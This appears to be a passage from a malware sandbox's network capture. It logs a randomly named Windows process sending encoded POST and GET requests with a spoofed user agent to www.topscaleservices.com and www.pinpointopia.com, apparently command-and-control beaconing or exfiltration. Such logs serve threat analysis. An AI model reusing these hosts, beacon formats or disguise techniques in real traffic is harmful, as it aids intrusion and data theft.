May 27, 2024 12:21:56.101425886 CEST	1236	IN	HTTP/1.1 404 Server: ZGS Date: Mon, 27 May 2024 10:21:56 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: 8ae64e9492=0f71d2b25c73f2883ce01c2fd3c97eb8; Path=/ Set-Cookie: csrfc=cd18fb7f-73be-452d-9f96-8bcd21365f06;path=/;priority=high Set-Cookie: _zcsr_tmp=cd18fb7f-73be-452d-9f96-8bcd21365f06;path=/;SameSite=Strict;priority=high Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT vary: accept-encoding Content-Encoding: gzip Data Raw: 35 37 32 0d 0a 1f 8b 08 00 00 00 00 00 00 00 cd 58 db 6e e3 36 10 7d ef 57 70 15 6c b0 8b 46 91 2c 59 b1 a3 c8 0e da a4 58 f4 69 0b a4 40 d1 a2 2f b4 44 59 44 28 51 20 e9 d8 4e d0 7f ef 90 92 6d 5d 93 34 4f b5 37 b0 28 0e e7 76 ce 0c c9 8d 3e dd 7f bf fb fd cf df 7e 41 99 ca d9 f2 87 a8 fa 41 08 45 19 c1 89 79 d2 83 9c 28 8c 0a 9c 93 85 25 f8 8a 2b 69 a1 98 17 8a 14 6a 61 15 9c 16 09 d9 5d a0 82 a7 9c 31 be d5 4f 58 c4 19 7d 22 fa 51 16 b4 2c 89 b2 90 73 54 a7 a8 62 64 f9 17 cf 78 e4 54 cf 87 19 46 8b 47 a4 f6 25 18 52 64 a7 9c 58 82 29 41 d8 c2 92 6a cf 88 cc 88 d6 94 09 92 2e 2c 67 4b 56 29 78 21 6f 53 9c 53 b6 5f 7c 2f 49 f1 e3 03 2e 64 38 75 dd 8b 2b d7 b5 8e 7a cd ea c3 08 3e 2b 9e ec 5f 4e 43 f8 68 4d 76 a5 28 b4 b4 26 a4 35 59 17 48 c2 8f 2d 89 a0 e9 4d 7f 81 a4 cf 24 9c 4c ca 5d 7b 2e c7 62 4d 8b d0 85 f7 a8 35 51 e2 24 a1 c5 7a 60 66 85 e3 c7 b5 e0 9b 22 b1 63 ce b8 08 cf d2 40 7f 1b 8a ff 39 3d 5e 2a 5e de 69 31 f9 32 a2 25 44 76 ce 9f 6d 48 28 c1 c2 5e 0b 9c 50 80 eb 0b 23 a9 ba 40 67 a9 [TRUNCATED] Data Ascii: 572Xn6}WplF,YXi@/DYD(Q Nm]4O7(v>~AAEy(%+ija]1OX}"Q,sTbdxTFG%RdX)Aj.,gKV)x!oSS_\|/I.d8u+z>+_NChMv(&5YH-M$L]{.bM5Q$z`f"c@9=^^i12%DvmH(^P#@g;r?@fF,Mbu<q_o]_zWa:rFuBr?DDe!s)RYVGvM.1v"!`mia$g4AgZ5Oyt W>ALD:!\|]&k;>d]<OD@e4IH1l%=CV/1{&j4#JN4dZ@XM'D=w\|PCr&7h2}3Tg5>1F
May 27, 2024 12:21:56.101452112 CEST	721	IN	Data Raw: 31 b8 74 91 7f 04 8e 77 81 fa 56 be 2f 2b 01 d8 67 5f c6 73 02 b3 cd 4d ae b9 3c e1 ba 69 56 9d a6 a3 a1 ee 3e ba 87 df 07 63 eb cd 6a 5a a4 7c a4 4c 4c c2 a7 e3 a5 76 5c 8f 18 45 5d 1d 4d d8 af 5e 81 4c b3 15 70 eb 4c 33 2a 61 b5 3e 6f 40 7a 0b Data Ascii: 1twV/+g_sM<iV>cjZ\|LLv\E]M^LpL3a>o@zI ]7jvw]3ufa 5f!V]1;J.#aFA[vt f;m5<kPUoNbyNEoKGbg'z;{sX.'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.12	49745	136.143.186.12	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:58.029963017 CEST	738	OUT	POST /uyud/ HTTP/1.1 Host: www.topscaleservices.com Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.topscaleservices.com Cache-Control: no-cache Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Referer: http://www.topscaleservices.com/uyud/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 58 36 72 4f 56 74 6b 62 53 4e 62 66 5a 30 4e 66 48 74 78 56 4a 73 42 55 65 5a 78 42 73 42 79 56 6d 31 57 62 67 61 33 55 51 54 77 74 76 72 71 78 67 4e 4c 56 7a 57 51 74 71 6d 6f 44 72 31 68 39 42 52 49 37 38 6a 7a 4c 32 37 43 41 72 34 38 47 34 4c 7a 4c 46 79 4d 53 42 39 76 44 79 55 79 55 50 47 53 79 2f 4b 6a 2f 49 4f 64 63 6d 6e 54 5a 54 56 54 48 71 4a 49 41 75 77 69 37 5a 6a 4f 75 53 46 55 58 32 31 58 55 67 38 77 51 65 58 63 4f 57 43 79 48 73 70 69 78 76 41 37 5a 64 52 45 44 57 42 44 73 72 6d 77 36 58 73 37 64 65 6d 58 6e 45 47 75 4f 52 30 70 41 72 51 56 43 6a 73 5a 64 6b 45 68 56 48 74 59 4f 6f 6a 53 50 61 61 46 59 68 54 4e 4c 67 64 45 3d Data Ascii: VlEHDVvh=X6rOVtkbSNbfZ0NfHtxVJsBUeZxBsByVm1Wbga3UQTwtvrqxgNLVzWQtqmoDr1h9BRI78jzL27CAr48G4LzLFyMSB9vDyUyUPGSy/Kj/IOdcmnTZTVTHqJIAuwi7ZjOuSFUX21XUg8wQeXcOWCyHspixvA7ZdREDWBDsrmw6Xs7demXnEGuOR0pArQVCjsZdkEhVHtYOojSPaaFYhTNLgdE=
May 27, 2024 12:21:58.657164097 CEST	1236	IN	HTTP/1.1 404 Server: ZGS Date: Mon, 27 May 2024 10:21:58 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: 8ae64e9492=4f8d155d92baa51fc002217e6d409cd9; Path=/ Set-Cookie: csrfc=975db78d-4f3e-4052-b2ef-a9b0002c734a;path=/;priority=high Set-Cookie: _zcsr_tmp=975db78d-4f3e-4052-b2ef-a9b0002c734a;path=/;SameSite=Strict;priority=high Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT vary: accept-encoding Content-Encoding: gzip Data Raw: 35 37 32 0d 0a 1f 8b 08 00 00 00 00 00 00 00 cd 58 db 6e e3 36 10 7d ef 57 70 15 6c b0 8b 46 91 2c 59 b1 a3 c8 0e da a4 58 f4 69 0b a4 40 d1 a2 2f b4 44 59 44 28 51 20 e9 d8 4e d0 7f ef 90 92 6d 5d 93 34 4f b5 37 b0 28 0e e7 76 ce 0c c9 8d 3e dd 7f bf fb fd cf df 7e 41 99 ca d9 f2 87 a8 fa 41 08 45 19 c1 89 79 d2 83 9c 28 8c 0a 9c 93 85 25 f8 8a 2b 69 a1 98 17 8a 14 6a 61 15 9c 16 09 d9 5d a0 82 a7 9c 31 be d5 4f 58 c4 19 7d 22 fa 51 16 b4 2c 89 b2 90 73 54 a7 a8 62 64 f9 17 cf 78 e4 54 cf 87 19 46 8b 47 a4 f6 25 18 52 64 a7 9c 58 82 29 41 d8 c2 92 6a cf 88 cc 88 d6 94 09 92 2e 2c 67 4b 56 29 78 21 6f 53 9c 53 b6 5f 7c 2f 49 f1 e3 03 2e 64 38 75 dd 8b 2b d7 b5 8e 7a cd ea c3 08 3e 2b 9e ec 5f 4e 43 f8 68 4d 76 a5 28 b4 b4 26 a4 35 59 17 48 c2 8f 2d 89 a0 e9 4d 7f 81 a4 cf 24 9c 4c ca 5d 7b 2e c7 62 4d 8b d0 85 f7 a8 35 51 e2 24 a1 c5 7a 60 66 85 e3 c7 b5 e0 9b 22 b1 63 ce b8 08 cf d2 40 7f 1b 8a ff 39 3d 5e 2a 5e de 69 31 f9 32 a2 25 44 76 ce 9f 6d 48 28 c1 c2 5e 0b 9c 50 80 eb 0b 23 a9 ba 40 67 a9 [TRUNCATED] Data Ascii: 572Xn6}WplF,YXi@/DYD(Q Nm]4O7(v>~AAEy(%+ija]1OX}"Q,sTbdxTFG%RdX)Aj.,gKV)x!oSS_\|/I.d8u+z>+_NChMv(&5YH-M$L]{.bM5Q$z`f"c@9=^^i12%DvmH(^P#@g;r?@fF,Mbu<q_o]_zWa:rFuBr?DDe!s)RYVGvM.1v"!`mia$g4AgZ5Oyt W>ALD:!\|]&k;>d]<OD@e4IH1l%=CV/1{&j4#JN4dZ@XM'D=w\|PCr&7h2}3Tg5>1F
May 27, 2024 12:21:58.657398939 CEST	721	IN	Data Raw: 31 b8 74 91 7f 04 8e 77 81 fa 56 be 2f 2b 01 d8 67 5f c6 73 02 b3 cd 4d ae b9 3c e1 ba 69 56 9d a6 a3 a1 ee 3e ba 87 df 07 63 eb cd 6a 5a a4 7c a4 4c 4c c2 a7 e3 a5 76 5c 8f 18 45 5d 1d 4d d8 af 5e 81 4c b3 15 70 eb 4c 33 2a 61 b5 3e 6f 40 7a 0b Data Ascii: 1twV/+g_sM<iV>cjZ\|LLv\E]M^LpL3a>o@zI ]7jvw]3ufa 5f!V]1;J.#aFA[vt f;m5<kPUoNbyNEoKGbg'z;{sX.'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.12	49746	136.143.186.12	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:00.565164089 CEST	1751	OUT	POST /uyud/ HTTP/1.1 Host: www.topscaleservices.com Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.topscaleservices.com Cache-Control: no-cache Connection: close Content-Length: 1237 Content-Type: application/x-www-form-urlencoded Referer: http://www.topscaleservices.com/uyud/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 58 36 72 4f 56 74 6b 62 53 4e 62 66 5a 30 4e 66 48 74 78 56 4a 73 42 55 65 5a 78 42 73 42 79 56 6d 31 57 62 67 61 33 55 51 54 34 74 75 5a 79 78 68 75 7a 56 68 47 51 74 6c 32 6f 4f 72 31 67 2f 42 52 52 79 38 6a 32 30 32 39 47 41 72 61 30 47 70 71 7a 4c 63 43 4d 53 4f 64 76 43 38 30 79 46 50 43 2b 32 2f 4f 50 2f 49 4f 64 63 6d 68 66 5a 44 78 6e 48 36 35 49 44 70 77 69 33 49 7a 4f 47 53 46 4d 70 32 32 37 75 67 4d 51 51 51 58 4d 4f 58 78 61 48 71 35 69 7a 69 67 37 42 64 52 41 6d 57 48 6d 58 72 6d 70 66 58 72 33 64 63 53 61 52 63 6b 79 71 4d 57 6c 79 68 67 55 6b 6b 72 39 36 67 6b 39 4b 48 4d 51 4f 76 78 50 53 66 39 6f 6e 6b 41 5a 51 69 4b 58 41 6c 41 66 2b 4e 4e 37 57 67 53 78 77 70 44 47 33 30 37 2b 64 4c 4a 4c 68 44 79 42 2f 75 76 63 39 70 50 31 5a 53 70 6b 66 35 58 54 77 62 65 42 4d 65 57 72 52 58 38 68 53 6b 5a 35 74 4d 57 2b 58 64 6e 6f 6b 73 35 49 79 66 37 43 44 5a 79 4d 49 49 56 4a 64 53 45 6b 36 30 37 39 67 79 41 69 76 66 47 36 55 33 46 58 45 49 2b 44 61 73 4c 51 6c 6d [TRUNCATED] Data Ascii: VlEHDVvh=X6rOVtkbSNbfZ0NfHtxVJsBUeZxBsByVm1Wbga3UQT4tuZyxhuzVhGQtl2oOr1g/BRRy8j2029GAra0GpqzLcCMSOdvC80yFPC+2/OP/IOdcmhfZDxnH65IDpwi3IzOGSFMp227ugMQQQXMOXxaHq5izig7BdRAmWHmXrmpfXr3dcSaRckyqMWlyhgUkkr96gk9KHMQOvxPSf9onkAZQiKXAlAf+NN7WgSxwpDG307+dLJLhDyB/uvc9pP1ZSpkf5XTwbeBMeWrRX8hSkZ5tMW+Xdnoks5Iyf7CDZyMIIVJdSEk6079gyAivfG6U3FXEI+DasLQlm76CLjKWpMW6TvuRDiYD90uqVbEn1WyrS9HWnZ5rQ7DrD35n3y5p9EpWBC7BIKjS7Rj1BaDnf8f7T+jOiIvN9wDoQlhKgFSmZA5KqDT3DovCv417nS7Qv4DBMfcgMVxPcvs9rW/WllRH+GLlEQBGNGvL96H/+yWM8ed0SNRM/Cb8lFXD3T7/mSADgOgS8eibqXMWy7oCUENXJNCUxA79u9ndD3AVz7PqYZr4px8j6Hf2+2h7Mqmr9RZJCFiX4G019YRqITbJdvlRgpZJzz2gYPZ0o6+K36UuKVGkbUFaWV5RcSSWFNp9fqDqNVh4CyoQcKTDEiveEp3R/M+qDCsH+WdnALHYoiCf2Gq7HubtuF77jJyIv/XBn9QWFtsaxxCEJHCipQ1QcimZIuHaVp4TCCmodaJztQqEsnJio8tpAdgKVKBPutpXKOASfcn+AO4m7v1HsjoSCGH4glZX4QQkDo+i+1PRp6sH4K2oyVXyrFrXu4ex98TZ77yaMVoHB2aJXRMl70ZsUI9KWEb1SMJdsgBBcEfca/NVIvBuohwdt6Bu6w0l48dkBJN+K1Xo7TBSNeouBJwS2VrX8EVHKdDPNZgArpc6U/XZbX4GbjHK8hqhhV22R3hq2Eo0SvjcDNFxZhmtk0EdgBUIg4KwqUx2kdD51Jgx40ttj97 [TRUNCATED]
May 27, 2024 12:22:01.165678978 CEST	544	IN	HTTP/1.1 400 Server: ZGS Date: Mon, 27 May 2024 10:22:01 GMT Content-Type: text/html;charset=ISO-8859-1 Content-Length: 80 Connection: close Set-Cookie: 8ae64e9492=dd79e43911dfa5b823adc166d5a51b68; Path=/ Set-Cookie: csrfc=3406dc00-b724-4389-aa64-616848a53631;path=/;priority=high Set-Cookie: _zcsr_tmp=3406dc00-b724-4389-aa64-616848a53631;path=/;SameSite=Strict;priority=high Set-Cookie: JSESSIONID=EFF8E30643CCAFBDF9461B083279B8A0; Path=/; HttpOnly Data Raw: 7b 22 72 65 73 70 6f 6e 73 65 5f 63 6f 64 65 22 3a 22 34 30 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 22 31 22 2c 22 64 65 76 65 6c 6f 70 65 72 5f 6d 65 73 73 61 67 65 22 3a 22 49 6e 76 61 6c 69 64 20 69 6e 70 75 74 2e 22 7d 0a 0a Data Ascii: {"response_code":"400","status_code":"1","developer_message":"Invalid input."}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.12	49747	136.143.186.12	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:03.092117071 CEST	432	OUT	GET /uyud/?VlEHDVvh=a4DuWa1aWcmJH21/SNxRR+JRQb1v/kzaj3WKu4zLUxUUlKGTu9D1sWAogGI9gEZiY1gr5T6O35XBnrIr/I/ZCy9af/SljyarCQCdkJfuLPpdjFvVaxfdqpU=&BHPD=o2nt HTTP/1.1 Host: www.topscaleservices.com Accept: / Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
May 27, 2024 12:22:03.706110001 CEST	1236	IN	HTTP/1.1 404 Server: ZGS Date: Mon, 27 May 2024 10:22:03 GMT Content-Type: text/html Content-Length: 4655 Connection: close Set-Cookie: 8ae64e9492=d2341ff8556820e5fe7583c4c06e32ae; Path=/ Set-Cookie: csrfc=88505af2-cb43-45d4-a6f0-b2a62d6d8150;path=/;priority=high Set-Cookie: _zcsr_tmp=88505af2-cb43-45d4-a6f0-b2a62d6d8150;path=/;SameSite=Strict;priority=high Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT vary: accept-encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 5a 6f 68 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 77 65 62 66 6f 6e 74 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 0a 20 20 20 20 20 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html> <head> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet" /> <title>Zoho</title> <link type="text/css" rel="stylesheet" href="/webfonts?family=Open+Sans:400,600"> <style> body{ font-family:"Open Sans", sans-serif; font-size:11px; margin:0px; padding:0px; background-color:#f5f5f5; } .topColors{ background: -moz-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background: -webkit-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0
May 27, 2024 12:22:03.706132889 CEST	1236	IN	Data Raw: 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 34 35 32 Data Ascii: 086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background-size:452px auto;height:3px; } .mainContainer{ width:1000px; margin:0px auto; } .logo{ margin-top:
May 27, 2024 12:22:03.706145048 CEST	1236	IN	Data Raw: 20 20 20 68 33 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 3b 0a 20 20 20 20 20 20 20 20 20 Data Ascii: h3{ font-size:18px; font-family: "Open Sans"; font-weight:normal; font-weight:600; } .weight400{ font-weight:400; } .domain-color{
May 27, 2024 12:22:03.706160069 CEST	1236	IN	Data Raw: 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 20 20 0a 20 20 Data Ascii: (0, 0, 0, 0.12); color: #ffffff; font-size: 18px; font-weight: 300; padding: 10px 20px; text-decoration: none; position:relative; } </style>
May 27, 2024 12:22:03.710835934 CEST	232	IN	Data Raw: 61 73 73 3d 22 69 6d 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 77 69 64 74 68 3d 22 37 30 30 70 78 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 7a 6f 68 6f Data Ascii: ass="img-container"> <img width="700px" src="https://www.zoho.com/sites/images/professionally-crafted-themes.png" style="margin-top: 15px"> </div> </div> </div> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.12	49748	216.40.34.41	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:22:09.441957951 CEST	706	OUT	POST /w8kk/ HTTP/1.1 Host: www.pinpointopia.com Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.pinpointopia.com Cache-Control: no-cache Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Referer: http://www.pinpointopia.com/w8kk/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 38 43 42 69 64 6f 53 4c 70 31 6f 4f 2f 66 65 4a 63 49 7a 42 2f 6e 51 4c 38 48 6e 34 52 78 64 70 61 42 55 46 5a 57 48 2f 53 37 6b 78 75 67 76 63 6a 77 69 4a 79 61 6f 46 73 6e 62 71 41 58 45 32 31 6a 72 33 35 63 4d 51 4b 43 6e 71 72 2f 6c 43 5a 54 50 57 43 56 77 36 4a 7a 49 65 4e 4c 4c 73 36 75 61 30 5a 69 55 63 51 66 4b 2f 46 43 42 34 62 5a 58 5a 4a 4a 65 58 61 45 37 38 61 59 5a 47 74 56 56 55 6a 48 69 73 51 42 57 2b 4e 36 75 79 75 2b 45 49 47 63 73 54 37 34 58 4d 41 6f 74 6d 76 46 66 63 6c 73 46 57 6f 48 75 5a 44 46 69 2b 78 70 42 57 68 4a 65 45 75 36 6d 52 55 66 4d 64 6d 51 3d 3d Data Ascii: VlEHDVvh=8CBidoSLp1oO/feJcIzB/nQL8Hn4RxdpaBUFZWH/S7kxugvcjwiJyaoFsnbqAXE21jr35cMQKCnqr/lCZTPWCVw6JzIeNLLs6ua0ZiUcQfK/FCB4bZXZJJeXaE78aYZGtVVUjHisQBW+N6uyu+EIGcsT74XMAotmvFfclsFWoHuZDFi+xpBWhJeEu6mRUfMdmQ==
May 27, 2024 12:22:09.978420019 CEST	1236	IN	HTTP/1.1 404 Not Found content-type: text/html; charset=UTF-8 x-request-id: b3ea6652-71e6-42ec-82fc-59bf43e16dc5 x-runtime: 0.033146 content-length: 18110 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
May 27, 2024 12:22:09.978441000 CEST	224	IN	Data Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source {
May 27, 2024 12:22:09.978454113 CEST	1236	IN	Data Raw: 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 39 44 39 44 39 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 45 43 45 43 45 43 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 Data Ascii: border: 1px solid #D9D9D9; background: #ECECEC; width: 978px; } .source pre { padding: 10px 0px; border: none; } .source .data { font-size: 80%; overflow: auto; background-colo
May 27, 2024 12:22:09.978466988 CEST	1236	IN	Data Raw: 65 3a 20 74 65 78 74 66 69 65 6c 64 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 62 6f 64 79 20 74 72 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 3b 0a 20 20 Data Ascii: e: textfield; } #route_table tbody tr { border-bottom: 1px solid #ddd; } #route_table tbody tr:nth-child(odd) { background: #f2f2f2; } #route_table tbody.exact_matches, #route_table tbody.fuzzy_matches { background
May 27, 2024 12:22:09.978486061 CEST	1236	IN	Data Raw: 2f 68 65 61 64 65 72 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 3c 68 32 3e 4e 6f 20 72 6f 75 74 65 20 6d 61 74 63 68 65 73 20 5b 50 4f 53 54 5d 20 26 71 75 6f 74 3b 2f 77 38 6b 6b 26 71 75 6f 74 3b 3c 2f 68 32 3e Data Ascii: /header><div id="container"> <h2>No route matches [POST] "/w8kk"</h2> <p><code>Rails.root: /hover-parked</code></p><div id="traces"> <a href="#" onclick="hide('Framework-Trace');hide('Full-Trace');show(&#
May 27, 2024 12:22:09.978498936 CEST	1236	IN	Data Raw: 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 33 22 20 68 72 65 66 3d 22 23 22 3e 72 61 69 6c 74 69 65 73 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 72 61 69 6c 73 2f 72 61 63 6b 2f 6c 6f 67 67 65 72 2e 72 62 3a 32 36 3a 69 6e 20 60 62 6c 6f 63 6b 20 Data Ascii: data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `block in call'</a><br><a class="trace-frames" data-frame-id="4" href="#">activesupport (5.2.6) lib/active_support/tagged_logging.rb:71:in `block in tagged'</a>
May 27, 2024 12:22:09.978511095 CEST	1236	IN	Data Raw: 6e 74 69 6d 65 2e 72 62 3a 32 32 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 33 22 20 68 72 65 66 3d 22 Data Ascii: ntime.rb:22:in `call'</a><br><a class="trace-frames" data-frame-id="13" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call'</a><br><a class="trace-frames" data-frame-id="14" href="#">
